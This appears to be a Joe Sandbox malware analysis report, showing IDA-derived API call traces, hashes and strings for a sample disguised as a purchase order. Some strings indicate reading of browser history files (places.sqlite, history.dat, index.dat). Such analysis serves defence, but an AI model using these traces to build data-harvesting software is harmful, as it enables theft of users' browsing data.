                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID:
                                                              • API String ID: 1979745280-0
                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • free.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2641622041-467022611
                                                              • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleSleep
                                                              • String ID: }A
                                                              • API String ID: 252777609-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              APIs
                                                              • malloc.MSVCRT ref: 00409A10
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • free.MSVCRT ref: 00409A31
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: .Wu
                                                              • API String ID: 2081463915-3424199868
                                                              • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2445788494-0
                                                              • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                              • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041BDDF
                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                              • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
